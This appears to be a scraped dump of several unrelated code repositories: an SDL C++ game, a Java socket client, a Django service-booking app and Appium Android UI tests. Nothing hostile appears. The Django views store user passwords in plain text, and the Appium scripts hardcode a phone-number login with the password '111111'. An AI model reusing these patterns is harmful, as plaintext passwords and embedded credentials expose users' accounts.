                        if( sqrt( pow( (double) ( (station->xPos()+100)-abul[i]->xPos() ), 2.0 ) + pow( (double) ( (station->yPos()+100)-abul[i]->yPos() ), 2.0 ) ) < 60)
                        {
                            for(int p = i; p<bulletCount-1; p++)
                            {
                                abul[p] = abul[p+1];
                            }
                            i--;
                            bulletCount--;
                            hpLeft = station->gotHit();
                            if(hpLeft == 0)
                            {
                                quit = true;   // boss destroyed: player wins
                            }
                        }
                    }
                }
                // Enemy bullets: hit-test the player, cull off-screen shots.
                for(int i = 0; i<bulletCount2; i++)
                {
                    ebul[i]->move();
                    if( sqrt( pow( (double) ( (fight.xPos()+25)-ebul[i]->xPos() ), 2.0 ) + pow( (double) ( (fight.yPos()+25)-ebul[i]->yPos() ), 2.0 ) ) < 30)
                    {
                        for(int p = i; p<bulletCount2-1; p++)
                        {
                            ebul[p] = ebul[p+1];
                        }
                        i--;
                        bulletCount2--;
                        hpLeft = fight.gotHit();
                        if(hpLeft == 0)
                        {
                            quit = true;   // player destroyed: game over
                        }
                    }
                    else
                    if(ebul[i]->xPos()+Bullet_RADIUS < 0 || ebul[i]->xPos() > SCREEN_WIDTH-50 ||
                       ebul[i]->yPos()+Bullet_RADIUS < 0 || ebul[i]->yPos() > SCREEN_HEIGHT
                    )
                    {
                        for(int p = i; p<bulletCount2-1; p++)
                        {
                            ebul[p] = ebul[p+1];
                        }
                        i--;
                        bulletCount2--;
                    }
                }
                //Clear screen
                SDL_SetRenderDrawColor( gRenderer, 0xFF, 0xFF, 0xFF, 0xFF );
                SDL_RenderClear( gRenderer );
                //Render wall
                SDL_SetRenderDrawColor( gRenderer, 0x00, 0x00, 0x00, 0xFF );
                //Render FIGHTER
                // Black playfield, plus the player's blue HP bar growing
                // upward from the bottom of the right-hand HUD strip.
                boxRGBA(gRenderer, 0, 0, SCREEN_WIDTH-50, SCREEN_HEIGHT, 0x0,0x0,0x0,0xFF);
                boxRGBA(gRenderer, SCREEN_WIDTH-40, SCREEN_HEIGHT-(20*fight.getHp()), SCREEN_WIDTH-25, SCREEN_HEIGHT, 0x0,0x0,0xFF,0xFF);
                fight.render();
                if(boss)
                {
                    // Red boss HP bar, growing down from the top of the strip.
                    boxRGBA(gRenderer, SCREEN_WIDTH-40, 0, SCREEN_WIDTH-25, 0+(station->getHp()*10), 0xFF,0x0,0x0,0xFF);
                    station->render();
                }
                for(int i = 0; i<alienCount;i++)
                {
                    aliens[i]->render();
                }
                for(int i = 0; i<bulletCount; i++)
                {
                    abul[i]->render();
                }
                for(int i = 0; i<bulletCount2; i++)
                {
                    ebul[i]->render();
                }
                //Update screen
                SDL_RenderPresent( gRenderer );
            }
        }
    }
    //Free resources and close SDL
    close();
    return 0;
}
<file_sep>/README.md
# Finals (deadline: 2015-03-XX)
Submit your finals here. Here are a couple of reminders:
1. Do not commit compiler or IDE-generated files (the *.o, *.pdb among others)
2. Documentation, especially on how to build and play the game, is appreciated.
3. Also commit a PDF version of the [Certificate of Authorship for groups](http://www.admu.edu.ph/ls/sose/iscs/downloads).
To build the game you'll need to get SDL2 and SDL2_gfx running for your project. Here is one way to do it:
Using eclipse kepler on mac OSX
1.) Download SDL framework from http://www.libsdl.org/download-2.0.php then copy paste the SDL framework in your Library/Frameworks
2.) make a new C++ project with executable Hello World C++ Project and name it main.cpp
3.) right-click your project, then click properties->c/c++ Build->Settings->Tool Settings tab->Miscellaneous, and add this to the linker flags: "-framework SDL2 -framework Cocoa" (without the quotes)
4.) Download SDL2_gfx from http://cms.ferzkopp.net/index.php/software/13-sdl-gfx
5.) unzip your SDL2_gfx and add these files to where your project directory is
SDL2_gfxPrimitives.h
SDL2_gfxPrimitives.c
SDL2_gfxPrimitives_font.h
SDL2_rotozoom.c
SDL2_rotozoom.h
6.) in SDL2_gfxPrimitives.h and SDL2_rotozoom.h, change the line that says #include "SDL.h" to
#include "SDL2/SDL.h"
7.) Build and run it
This game has 3 classes: FIGHTER, ALIEN, and BOSS.
All three have a move() method that lets them move around and shoot bullets based on their shootTimer, but only the fighter is controlled by the player. The FIGHTER also has a handleEvent() method so it knows how to move around and fire its bullets toward the enemy.
All three have hp and a gotHit() method, so they lose 1 hp when the code detects that a bullet touched them.
All three have render(), which draws the respective bmp file as their avatar.
using boxRGBA of the SDL_gfx and the getHp() method of the boss and fighter I show their respective health on the right most part of the game
| 48fe3cdcf216a64fa2ebab3d688f005684e32409 | [
"Markdown",
"C++"
] | 2 | C++ | NegiXNodoka/final | 192f55ff1f823fabbf07113f2a0c621409929d92 | 11603fc5d3271590bf2bb65def7da4e02921f340 |
refs/heads/master | <repo_name>clotildeguinard/MyCloudDB<file_sep>/src/test/TestLogging.java
package test;
import tools.Loggable;
import org.apache.log4j.Level;
public class TestLogging extends Loggable {
    /**
     * Demonstrates the inherited logger: removes the "file" appender and
     * emits one message per severity level (warn, error, fatal).
     */
    private void testLogger() {
        logger.removeAppender("file");
        logger.warn("This is warn");
        logger.error("This is error");
        logger.fatal("This is fatal");
    }
    /**
     * Entry point: runs the logging demo.
     *
     * @param args unused command-line arguments
     */
    public static void main(String[] args) {
        TestLogging obj = new TestLogging();
        obj.testLogger();
    }
}
<file_sep>/README.md
MyCloudDB
=========
Project for the lab "Cloud data bases"
<file_sep>/src/ui/ClientLogic.java
package ui;
import java.io.*;
import java.net.*;
import tools.Loggable;
/**
*
* @author nadiastraton
*/
public class ClientLogic extends Loggable {
public static Socket socket;
    /**
     * Opens a TCP connection to the echo server and caches it in the
     * static {@code socket} field.
     *
     * @param ipAddress host name or IP address of the server
     * @param port      TCP port of the server
     * @return the client socket after connecting; if the attempt fails the
     *         previous content of the static field is returned — possibly
     *         null or a stale socket (NOTE(review): callers should check)
     */
    public static Socket connect(String ipAddress, int port) {
        logger.debug("Connection attempt...");
        try {
            socket = new Socket(ipAddress, port);
            logger.info("Connection successful with parameters " + ipAddress + " and " + port);
        } catch (Exception e) {
            logger.error("Failed to connect with parameters " + ipAddress + " and " + port + " : " + e);
        }
        return socket;
    }
    /**
     * Closes the given socket if there is one.
     *
     * @param sock the socket to close; may be null
     * @return true if the socket was null or closed successfully,
     *         false if closing raised an I/O error
     */
    public static boolean disconnect(Socket sock)
    {
        logger.debug("Disconnection attempt...");
        if (sock != null) {
            try {
                sock.close();
            } catch (IOException ioex) {
                logger.error("Failed to disconnect : " + ioex);
                return false;
            }
        }
        logger.info("Successfully disconnected");
        return true;
    }
    /**
     * Sends a non-null byte array through the socket, prefixed with its
     * length as a 4-byte int (the framing written by DataOutputStream).
     *
     * @param myByteArray the payload to send; must not be null
     * @return true on success, false if an I/O error occurred
     */
    public static boolean send(byte[] myByteArray) {
        logger.info("Sending an array of bytes, length : " + myByteArray.length);
        int start = 0;
        int len = myByteArray.length;
        try {
            OutputStream out = socket.getOutputStream();
            DataOutputStream dos = new DataOutputStream(out);
            dos.writeInt(len);
            if (len > 0) {
                dos.write(myByteArray, start, len);
            }
            return true;
        } catch (IOException ioex) {
            logger.error("Failed to send array of bytes, length " + myByteArray.length + " : " + ioex);
            return false;
        }
    }
/**
*
* @return A message from the server
*/
public static byte[] receive() {
logger.info("Receiving answer...");
try {
byte[] b = new byte[16384];
ByteArrayOutputStream buffer = new ByteArrayOutputStream();
InputStream in = socket.getInputStream();
DataInputStream dis = new DataInputStream(in);
while (in.read(b) != -1) {
buffer.write(b);
}
buffer.flush();
logger.debug("Received answer");
return buffer.toByteArray();
} catch (IOException e) {
logger.error("Failed to receive array of bytes : " + e);
return null;
}
}
    /**
     * Prints the list of supported shell commands to stdout.
     */
    public static void help(){
        logger.debug("Providing help.");
        System.out
                .println("\nFollowing set of commands provide following functionalities:"
                        + "\nconnect <ipAddress> <portNumber>: establishes connection to the echo server "
                        + "\ndisconnect: disconnects from the server and receives confirmation message "
                        + "\nsend <message>: sends the message to the server "
                        + "\nlogLevel: prints out current log level"
                        + "\nlogLevel <logLevel>: changes log level to one of the following : ALL, DEBUG, INFO, WARN, ERROR, FATAL, OFF"
                        + "\nquit: tears down the active connection and shut down the system ");
    }
    /**
     * Tears down the cached connection as part of shutting the client down.
     *
     * @return True if no socket remains connected, false if the connected socket fails to close.
     */
    public static boolean quit(){
        logger.info("Attempt to quit; asking to disconnect...");
        return disconnect(socket);
    }
    /**
     * Logs an unrecognized shell command.
     *
     * @param any the raw command text typed by the user
     * @return always false, so callers can propagate the failure
     */
    public static boolean unknownCommand(String any)
    {
        logger.warn("Unknown command: " + any);
        return false;
    }
} | e472fac6f9ecf216aa5e9d22ef04ba86e8c6426b | [
"Markdown",
"Java"
] | 3 | Java | clotildeguinard/MyCloudDB | 834b55a918990cd4874529f4b82ea45d04f0723c | df313d6148b81a6d319f1816c0a665d7736bd3e8 |
refs/heads/master | <repo_name>Avinash9565/my-first-blog<file_sep>/web1/demo/migrations/0002_order_p_order.py
# Generated by Django 3.0.4 on 2020-12-04 06:27
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('demo', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user', models.CharField(max_length=25)),
('work', models.CharField(max_length=25)),
('worker', models.CharField(max_length=25)),
('date', models.DateField()),
('slot', models.CharField(max_length=25)),
],
),
migrations.CreateModel(
name='p_order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user', models.CharField(max_length=25)),
('work', models.CharField(max_length=25)),
('worker', models.CharField(max_length=25)),
('date', models.DateField()),
('slot', models.CharField(max_length=25)),
('part', models.CharField(max_length=25)),
],
),
]
<file_sep>/web1/demo/models.py
from django.db import models
# Create your models here.
class Customer(models.Model):
Name = models.CharField( max_length=50)
Mail = models.EmailField( max_length=254)
Phnno = models.BigIntegerField()
worker = models.BooleanField()
work = models.CharField( max_length=50)
user_ID = models.CharField(max_length=20,primary_key=True)
password = models.CharField( max_length=50)
def __str__(self):
return self.Name
class order(models.Model):
user = models.CharField( max_length=25)
work = models.CharField( max_length=25)
worker = models.CharField( max_length=25)
date = models.DateField()
slot = models.CharField( max_length=25)
class p_order(models.Model):
user = models.CharField( max_length=25)
work = models.CharField( max_length=25)
worker = models.CharField( max_length=25)
date = models.DateField()
slot = models.CharField( max_length=25)
part = models.CharField( max_length=25)
"""class Meta:
verbose_name = _("")
verbose_name_plural = _("s")
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse("_detail", kwargs={"pk": self.pk})"""
<file_sep>/web1/demo/views.py
from django.contrib.auth.models import User
from django.contrib.auth import authenticate,login,logout
from django.shortcuts import render,redirect
from django.contrib import messages
from .forms import RegisterForm
from .models import Customer,order,p_order
# Create your views here.
def index(request):
    """Render the landing page."""
    return render(request,"home.html")
def about(request):
    """Render the static about page."""
    return render(request,"about.html")
def logout_view(request):
    """Log the current user out and return to the landing page."""
    logout(request)
    return render(request,"home.html")
def use(request):
    """Registration view.

    Validates the submitted form and, on success, saves a Customer row and
    creates a django.contrib.auth User with the same credentials, then
    renders the home page. On any validation failure it redirects back to
    /user with a flash message.
    """
    form = RegisterForm()
    if request.method == 'POST':
        form = RegisterForm(request.POST)
        un = request.POST['Name']
        em = request.POST['Mail']
        pn = request.POST['Phnno']
        wk = request.POST.get('worker', False)
        wrk = request.POST['work']
        uid = request.POST['user_ID']
        pw = request.POST['password']
        print(wk)
        if Customer.objects.filter(user_ID=uid).exists():
            messages.info(request, "user id already taken")
            return redirect('/user')
        elif len(pw) <= 6:
            messages.info(request, "password must be greater than 6")
            return redirect('/user')
        elif len(pn) != 10 and len(pn) != 11:
            messages.info(request, "please enter valid phone number")
            return redirect('/user')
        # Bug fix: the original joined these checks with `and` (so ALL had to
        # fail at once) and compared a *reversed* slice em[-4:0:-1] against
        # ".com", which meant invalid e-mail addresses were almost never
        # rejected. An address is now rejected when it is too short, OR has
        # no "@", OR does not end in ".com".
        elif len(em) <= 7 or "@" not in em or em[-4:] != ".com":
            messages.info(request, "enter valid email")
            return redirect('/user')
        else:
            if form.is_valid():
                # NOTE(review): this stores the password in plain text on
                # Customer, alongside the properly hashed auth User.
                form.save()
                u = User.objects.create_user(uid, em, pw)
                u.save()
                return render(request, "home.html")
    context = {'form': form}
    return render(request, "user.html", context)
def wor(request):
    """Login view: authenticates the posted credentials via Django auth.
    On success redirects to /login (which serves the post-login page);
    on failure re-renders the login form with a message."""
    if request.method =='POST':
        print("after login")
        uid=request.POST['user_ID']
        ps=request.POST['password']
        user = authenticate(username=uid,password=ps)
        # Dead scaffolding: a hand-rolled credential check kept as a string.
        """rq=Customer.objects.all()
        for zx in rq:
            if zx.user_ID==uid and zx.password==ps:
                cuid=uid
                return render(request,"aflogin.html")"""
        if user is not None:
            login(request,user)
            return redirect('/login')
        else:
            messages.info(request,"enter valid details")
            return render(request,"work.html")
        #return render(request,"aflogin.html")
    else:
        return render(request,"work.html")
def aflogin(request):
    """Render the post-login landing page."""
    print(request.user)
    return render(request,"aflogin.html")
def detail(request):
    """List every account flagged as a worker."""
    query_result=Customer.objects.filter(worker=True)
    print(request.user)
    context={'query_result':query_result}
    return render(request,"detail.html",context)
def book(request):
    """Booking view: place a hold (p_order), verify the worker exists and
    the slot is free, then promote the hold to a confirmed order.

    The provisional p_order row acts as a crude lock against two users
    booking the same slot concurrently; it is deleted again on every
    outcome (success, conflict, or invalid worker id).
    """
    if request.method=="POST":
        uid=request.POST['user_ID']
        wk=request.POST['work']
        dt=request.POST['date']
        t=request.POST['time']
        # Provisional hold for this exact user/worker/work/date/slot.
        ob=p_order()
        ob.user=request.user
        ob.work=wk
        ob.worker=uid
        ob.date=dt
        ob.slot=t
        ob.part="sample"
        ob.save()
        # Does the requested worker id exist at all?
        za=0
        zx=Customer.objects.all()
        for ot in zx:
            if ot.user_ID==uid:
                za+=1
        print(zx)
        if za!=0:
            # Is the slot already taken by a confirmed order?
            zs=0
            q=order.objects.all()
            for ot in q:
                #print(ot.work,ot.worker,ot.date,ot.slot)
                #print(wk,uid,dt,t)
                #print(len(str(dt)),len(str(ot.date)))
                if ot.work==wk and ot.worker==uid and str(ot.date)==str(dt) and ot.slot==t:
                    print("avinash")
                    zs=1
            if zs==1:
                messages.info(request,"please try another slot.this slot is already booked")
                print(p_order.objects.all().filter(user=request.user,worker=uid,work=wk,date=dt,slot=t))
                p_order.objects.all().filter(user=request.user,worker=uid,work=wk,date=dt,slot=t).delete()
                return render(request,"book.html")
            else:
                # No confirmed order; check whether some OTHER user holds a
                # provisional p_order for the same slot right now.
                q=p_order.objects.all()
                zx=0
                print(p_order.objects.all().filter(user=request.user,worker=uid,work=wk,date=dt,slot=t))
                for ot in q:
                    # NOTE(review): ot.user is a CharField compared against a
                    # User object, and ot.date (a date) is compared to the raw
                    # POST string (elsewhere both sides are str()-ed) — these
                    # comparisons may never match; verify.
                    if ot.user!=request.user and ot.work==wk and ot.worker==uid and ot.date==dt and ot.slot==t:
                        zx+=1
                if zx==0:
                    ob.delete()
                    print(q)
                    messages.info(request,"your slot is booked")
                    sl=order(worker=uid,work=wk,user=request.user,date=dt,slot=t)
                    sl.save()
                    return render(request,"book.html")
                else:
                    ob.delete()
                    messages.info(request,"please try after few seconds")
                    return render(request,"book.html")
        else:
            ob.delete()
            messages.info(request,"please enter a valid user-ID")
            return render(request,"book.html")
    else:
        return render(request,"book.html")<file_sep>/web1/demo/migrations/0001_initial.py
# Generated by Django 3.0.4 on 2020-12-03 09:18
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated initial migration: creates the Customer table."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Customer',
            fields=[
                ('Name', models.CharField(max_length=50)),
                ('Mail', models.EmailField(max_length=254)),
                ('Phnno', models.BigIntegerField()),
                ('worker', models.BooleanField()),
                ('work', models.CharField(max_length=50)),
                ('user_ID', models.CharField(max_length=20, primary_key=True, serialize=False)),
                ('password', models.CharField(max_length=50)),
            ],
        ),
    ]
| 85874e65381db1415112e6abca90430cd00f4f6a | [
"Python"
] | 4 | Python | Avinash9565/my-first-blog | 7230f4ac216dc375588af7d19d0340c1ffc0e9c5 | 7cf595aaa1a894970ffa645ae80ea9a99b440bc2 |
refs/heads/master | <repo_name>cwx727/Appium-Python-<file_sep>/handle/login_handle.py
import sys
sys.path.append("..")
from page.login_page import LoginPage
class LoginHandle:
def __init__(self,i):
self.login_page = LoginPage(i)
def send_username(self,username):
return self.login_page.get_username_element().send_keys(username)
def send_password(self,password):
return self.login_page.get_password_element().send_keys(password)
def click_login(self):
return self.login_page.get_login_button_element().click()
def click_forget_password(self):
return self.login_page.get_forget_password_element().click()
def click_register(self):
return self.login_page.get_register_element().click()
def get_fail_toast(self,message):
toast_element = self.login_page.get_toast_element(message)
if toast_element:
return True
else:
return False
<file_sep>/base/base_driver.py
import time
from appium import webdriver
import sys
sys.path.append("..")
from util.write_user_command import WriteUserCommand
class BaseDriver:
    """Builds Appium driver sessions from the per-device configuration
    written by WriteUserCommand (device serial, appium port, system port)."""
    def android_driver(self,i):
        '''
        Build the Android driver for device index i, reading its serial and
        ports from the user_info_<i> section of the shared config file.
        '''
        write_file = WriteUserCommand()
        # NOTE(review): 'daviceName' is misspelled, but it must match the key
        # used when the config file is written — do not "fix" one side only.
        device = write_file.get_value('user_info_'+str(i), 'daviceName')
        port = write_file.get_value('user_info_'+str(i), 'port')
        systemport = write_file.get_value('user_info_'+str(i), 'systemport')
        capabilities = {
            "platformName": "Android",
            "automationName": "UiAutomator2",
            "deviceName": device,
            #"deviceName":"2a25e47b7d29",
            "app": "E:\\mukewang.apk",
            #"app": "E:\\慕课网.apk",
            "appActivity" : ".user.login.MCLoginActivity",
            "noReset":"true",
            # distinct systemPort per device so sessions can run in parallel
            "systemPort":systemport,
        }
        driver = webdriver.Remote("http://127.0.0.1:" +port+"/wd/hub",capabilities)
        time.sleep(10)
        return driver
    def ios_driver(self):
        # iOS support not implemented.
        pass
    def get_driver(self):
        # Platform dispatch not implemented.
        pass
import sys
sys.path.append("..")
from handle.login_handle import LoginHandle
import time
class LoginBusiness:
def __init__(self,i):
self.login_handle = LoginHandle(i)
def login_pass(self):
self.login_handle.send_username('18513199586')
self.login_handle.send_password('<PASSWORD>')
self.login_handle.click_login()
def login_user_error(self):
self.login_handle.send_username('18513199587')
self.login_handle.send_password('<PASSWORD>')
self.login_handle.click_login()
time.sleep(3)
user_flag = self.login_handle.get_fail_toast('账号未注册')
if user_flag:
return True
else:
return False
def login_password_error(self):
self.login_handle.send_username('18513199586')
self.login_handle.send_password('<PASSWORD>')
self.login_handle.click_login()
time.sleep(3)
user_flag = self.login_handle.get_fail_toast('登录密码错误')
if user_flag:
return True
else:
return False
<file_sep>/case/start_appium.py
import sys
sys.path.append("..")
from appium import webdriver
import time
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from util.get_by_local import GetByLocal
#from util.read_init import ReadIni
def get_driver():
    """Create a single hard-coded Appium session against the emulator at
    127.0.0.1:21503 and return the driver once the app has settled."""
    capabilities = {
        "platformName": "Android",
        "automationName": "UiAutomator2",
        "deviceName": "127.0.0.1:21503",
        #"deviceName":"2a25e47b7d29",
        "app": "E:\\mukewang.apk",
        #"app": "E:\\慕课网.apk",
        #"appActivity" : ".index.splash.GuideActivity"
        "noReset":"true"
    }
    driver = webdriver.Remote("http://127.0.0.1:4723/wd/hub",capabilities)
    time.sleep(3)
    return driver
# Query the device screen dimensions.
def get_size():
    """Return the screen size as a (width, height) tuple."""
    dimensions = driver.get_window_size()
    return dimensions['width'], dimensions['height']
# Swipe left: drag from 90% of the screen width to 10%, at mid-height.
def swipe_left():
    x1 = get_size()[0]/10*9
    y1 = get_size()[1]/2
    x = get_size()[0]/10
    driver.swipe(x1,y1,x,y1)
# Swipe right: drag from 10% of the screen width to 90%, at mid-height.
def swipe_right():
    x1 = get_size()[0]/10
    y1 = get_size()[1]/2
    x = get_size()[0]/10*9
    driver.swipe(x1,y1,x,y1)
# Swipe up: drag from 90% of the screen height to 10%, at mid-width.
def swipe_up():
    x1 = get_size()[0]/2
    y1 = get_size()[1]/10*9
    y = get_size()[1]/10
    driver.swipe(x1,y1,x1,y)
# Swipe down: drag from 10% of the screen height to 90%, at mid-width.
def swipe_down():
    x1 = get_size()[0]/2
    y1 = get_size()[1]/10
    y = get_size()[1]/10*9
    driver.swipe(x1,y1,x1,y)
def swipe_on(direction):
    """Dispatch a swipe by name: 'up', 'down', 'left' or 'right'.
    Unknown directions are silently ignored, matching the original
    if/elif chain."""
    handlers = {
        'up': swipe_up,
        'down': swipe_down,
        'left': swipe_left,
        'right': swipe_right,
    }
    handler = handlers.get(direction)
    if handler is not None:
        handler()
# Locate by resource id.
def go_login():
    #print(driver.find_element_by_id('cn.com.open.mooc:id/tv_go_login'))
    driver.find_element_by_id('cn.com.open.mooc:id/tv_go_login').click()
# Locate by class name (index 4 happens to be the "go login" label —
# presumably stable for this app version; verify if the UI changes).
def go_login_by_class():
    #print(driver.find_element_by_class_name('android.widget.TextView'))
    elements = driver.find_elements_by_class_name('android.widget.TextView')
    #print(elements)
    #print(len(elements))
    elements[4].click()
# Locate by id, via the GetByLocal helper keyed into the locator config.
def login():
    get_by_local = GetByLocal(driver)
    get_by_local.get_element('username').send_keys('18513199586')
    get_by_local.get_element('password').send_keys('111111')
    get_by_local.get_element('login_button').click()
    '''
    driver.find_element_by_id(username).send_keys('18513199586')
    driver.find_element_by_id(password).send_keys('111111')
    driver.find_element_by_id(login_button).click()
    '''
# Locate through the element hierarchy (find a parent by id, then children
# by class name).
def login_by_node():
    element = driver.find_element_by_id('cn.com.open.mooc:id/sv_scrollview') # id of the parent element to search under
    elements = element.find_elements_by_class_name('android.widget.EditText')
    elements[0].send_keys('18513199586')
    elements[1].send_keys('111111')
    driver.find_element_by_id('cn.com.open.mooc:id/login_lable').click()
# Locate via Android UiAutomator selectors (by text and by resourceId).
def login_by_uiautomator():
    driver.find_element_by_android_uiautomator('new UiSelector().text("手机号/邮箱")').clear()
    driver.find_element_by_android_uiautomator('new UiSelector().text("手机号/邮箱")').send_keys('18513199586')
    driver.find_element_by_android_uiautomator('new UiSelector().resourceId("cn.com.open.mooc:id/password_edit")').send_keys('111111')
# Locate via XPath expressions.
def login_by_xpath():
    driver.find_element_by_xpath('//*[contains(@text,"忘记")]').click()# click the element whose text contains "忘记" ("forgot")
    #driver.find_element_by_xpath('//android.widget.TextView[@text="忘记密码"]').click() # TextView with the exact text "忘记密码"
    #driver.find_element_by_xpath('//android.widget.TextView[contains(@text,"忘记")]').click()# TextView whose text contains "忘记"
    '''
    #通过子节点,找父节点的兄弟节点
    driver.find_element_by_xpath('//android.widget.TextView[@resource-id="cn.com.open.mooc:id/login_lable"]/../preceding-sibling::android.widget.RelativeLayout').send_keys('123')
    driver.find_element_by_xpath('//android.widget.TextView[@resource-id="cn.com.open.mooc:id/login_lable"]/../preceding-sibling::*[@index="2"]').send_keys('111111')
    '''
def get_web_wiev():
    """Iterate the available contexts, switch to the native one, then close
    the in-app banner.
    NOTE(review): the loop breaks on NATIVE_APP, so despite the name this
    never actually switches into a WEBVIEW context — verify intent."""
    #time.sleep(5)
    webview = driver.contexts
    for view in webview:
        print(view)
        if view == 'NATIVE_APP':
            print("true")
            driver.switch_to.context(view)
            break
    time.sleep(5)
    driver.find_element_by_id('cn.com.open.mooc:id/icon_close').click()
def get_toast():
    """Log in with an unregistered account and wait up to 10 s for the
    'account not registered' toast to appear."""
    time.sleep(5)
    #driver.find_element_by_id('cn.com.open.mooc:id/account_edit').send_keys('18513199587')
    #driver.find_element_by_id('cn.com.open.mooc:id/login_lable').click()
    get_by_local = GetByLocal(driver)
    get_by_local.get_element('username').send_keys('18513199587')
    get_by_local.get_element('password').send_keys('111111')
    get_by_local.get_element('login_button').click()
    time.sleep(2)
    toast_element = ("xpath", "//*[contains(@text,'账号未注册')]")
    print(type(toast_element))
    print(WebDriverWait(driver, 10,0.1).until(EC.presence_of_element_located(toast_element)))
# Script entry: create the session, open the login screen, and run the
# toast demo. The disabled blocks below exercise the other helpers.
driver = get_driver()
'''
swipe_on('left')
time.sleep(2)
swipe_on('left')
time.sleep(2)
swipe_on('right')
time.sleep(2)
swipe_on('left')
time.sleep(2)
swipe_on('up')
time.sleep(2)
'''
go_login()
#go_login_by_class()
get_toast()
#login_by_node()
#login_by_uiautomator()
#login_by_xpath()
#get_web_wiev()
#get_toast()
#print(driver.page_source)
#driver.quit()<file_sep>/keyword/get_data.py
import sys
sys.path.append("..")
from util.opera_excel import OperaExcel
class GetData:
    """Typed accessors over the case sheet (case.xlsx) read via OperaExcel.

    Column layout: 3 = handle step (action method name), 4 = element key,
    5 = handle value (input data), 6 = expected element, 7 = expected
    handle, 8 = expected value, 9 = is-run flag.
    """

    def __init__(self):
        self.opera_excel = OperaExcel()

    def _cell_or_none(self, row, col):
        """Return the cell text at (row, col), or None when it is empty.

        Factors out the empty-string check that every optional-column
        getter previously repeated inline.
        """
        value = self.opera_excel.get_cell(row, col)
        if value == '':
            return None
        return value

    def get_case_lines(self):
        """Number of rows in the case sheet."""
        return self.opera_excel.get_lines()

    def get_handle_step(self, row):
        """Step column (3): the name of the action method to execute."""
        return self.opera_excel.get_cell(row, 3)

    def get_element_key(self, row):
        """Element column (4): locator key, or None if blank."""
        return self._cell_or_none(row, 4)

    def get_handle_value(self, row):
        """Value column (5): input data for the step, or None if blank."""
        return self._cell_or_none(row, 5)

    def get_expect_element(self, row):
        """Expected-element column (6), or None if blank."""
        return self._cell_or_none(row, 6)

    def get_is_run(self, row):
        """Is-run column (9): True only when the cell reads 'yes'."""
        return self.opera_excel.get_cell(row, 9) == 'yes'

    def get_expect_handle(self, row):
        """Expected-handle column (7), or None if blank."""
        return self._cell_or_none(row, 7)

    def get_expect_value(self, row):
        """Expected-value column (8), or None if blank."""
        return self._cell_or_none(row, 8)

    def write_value(self, row, value):
        """Write a pass/fail result back into the sheet at the given row."""
        self.opera_excel.write_value(row, value)
# Ad-hoc smoke check when the module is run directly.
if __name__ == '__main__':
    print(GetData().get_case_lines())
    print(GetData().get_expect_handle(3))
<file_sep>/util/server.py
import sys
sys.path.append("..")
from util.dos_cmd import DosCmd
from util.port import Port
import threading
from util.write_user_command import WriteUserCommand
import time
class Server:
    """Discovers connected Android devices via adb and boots one Appium
    server per device, each on its own set of ports."""

    def __init__(self):
        self.dos = DosCmd()
        self.devices_list = self.get_devices()
        self.write_file = WriteUserCommand()

    def get_devices(self):
        """Return the attached device serials, e.g.
        ['127.0.0.1:21503', '127.0.0.1:21523'], or None when `adb devices`
        lists no device."""
        devices_list = []
        result_list = self.dos.excute_cmd_get_result('adb devices')
        if len(result_list) >= 2:
            for i in result_list:
                if i[-6:] == 'device':
                    devices_list.append(i[:-7])
            return devices_list
        else:
            # Bug fix: the original returned the undefined name `none`,
            # which raised NameError whenever no device was attached.
            return None

    def create_port_list(self, start_port):
        """Build one free port per attached device, starting at start_port
        and skipping ports already in use."""
        port = Port()
        port_list = port.create_port_list(start_port, self.devices_list)
        return port_list

    def create_command_list(self, i):
        """Assemble the appium start command for device index i and persist
        the device/port mapping for later use by the tests."""
        command_list = []
        appium_port_list = self.create_port_list(4700)
        bootstrap_port_list = self.create_port_list(4900)
        system_port_list = self.create_port_list(5100)
        device_list = self.devices_list
        command = 'appium -p ' + str(appium_port_list[i]) + ' -bp ' + str(bootstrap_port_list[i]) + ' -U ' + device_list[i] + ' --no-reset --session-override --log ../log/test' + str(i + 1) + '.log'
        command_list.append(command)
        self.write_file.write_data(i, device_list[i], str(bootstrap_port_list[i]), str(appium_port_list[i]), system_port_list[i])
        return command_list

    def start_server(self, i):
        """Thread target: start the Appium server for device index i."""
        self.start_list = self.create_command_list(i)
        print(self.start_list)
        self.dos.excute_cmd(self.start_list[0])

    def kill_server(self):
        """If any node.exe (Appium) process is running on Windows, kill it."""
        server_list = self.dos.excute_cmd_get_result('tasklist | findstr "node.exe"')
        if len(server_list) > 0:
            # Bug fix: `taskkill -F -PID node.exe` is invalid (-PID expects a
            # numeric process id); kill by image name instead.
            self.dos.excute_cmd('taskkill /F /IM node.exe')

    def main(self):
        """Clear stale config, kill old servers, then launch one Appium
        instance per device on its own thread and wait for them to boot."""
        self.write_file.clear_data()
        self.kill_server()
        for i in range(len(self.devices_list)):
            appium_start = threading.Thread(target=self.start_server, args=(i,))
            appium_start.start()
            time.sleep(20)
# Boot one Appium server per attached device when run directly.
if __name__ == '__main__':
    Server().main()
<file_sep>/keyword/run_main.py
import sys
sys.path.append("..")
from get_data import GetData
from aciton_method import ActionMethod
from util.server import Server
class RunMain:
    """Keyword-driven runner: walks every row of case.xlsx, dispatches the
    named action via getattr on ActionMethod, and writes pass/fail back."""
    def run_method(self):
        Server().main()
        data = GetData()
        aciton_method = ActionMethod()
        lines = data.get_case_lines()
        for i in range(1,lines):
            handle_step = data.get_handle_step(i) # step column: action method name
            element_key = data.get_element_key(i) # element column: locator key
            handle_value = data.get_handle_value(i) # value column: input data
            expect_key = data.get_expect_element(i) # expected-element column
            expect_step = data.get_expect_handle(i) # expected-handle column
            expect_value = data.get_expect_value(i)
            print("-------第几行------:",i+1)
            # getattr resolves the ActionMethod attribute named by the step
            # column, e.g. returning a bound method such as input_key().
            excute_method = getattr(aciton_method,handle_step) # e.g. ActionMethod().input_key
            if element_key != None:# step takes a locator
                excute_method(element_key,handle_value) # e.g. driver.find_element_by_XX(...).send_keys(handle_value)
            else:
                excute_method(handle_value)# e.g. driver.find_element_by_XX(...).click()
            if expect_step != None:
                '''
                expect_result = getattr(aciton_method,expect_step)#获得ActionMethod().get_element
                print('------------expect_result-----------',expect_result)
